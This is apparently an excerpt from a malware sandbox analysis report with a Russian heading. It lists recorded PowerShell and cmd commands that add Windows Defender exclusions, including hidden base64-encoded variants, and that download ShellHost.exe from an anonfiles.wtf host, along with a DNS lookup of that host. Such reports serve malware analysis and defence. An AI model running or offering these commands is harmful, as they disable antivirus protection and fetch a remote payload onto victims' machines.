Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath $env:USERPROFILE -FORCE ; Add-MpPreference -ExclusionPath %WINDIR% -FORCE ; CURL -O "$env:TEMP\ShellHost.exe" https://cdn-01.anonfiles.wtf/_static/0dc23c42-e8f4-...
- DNS ASK cd####.anonfiles.wtf
- '<SYSTEM32>\cmd.exe' /c Powershell -enc UwBUAEEAUgBUACAAUABPAFcARQBSAFMASABFAEwATAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAIAAnAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAG...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc UwBUAEEAUgBUACAAUABPAFcARQBSAFMASABFAEwATAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAIAAnAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath $env:USERPROFILE -FORCE ; Add-MpPreference -ExclusionPath %WINDIR% -FORCE ; CURL -O "$env:TEMP\ShellHost.exe" https://cdn-01.anonfiles.wtf/_static/0dc23c42-e8f4-... (со скрытым окном)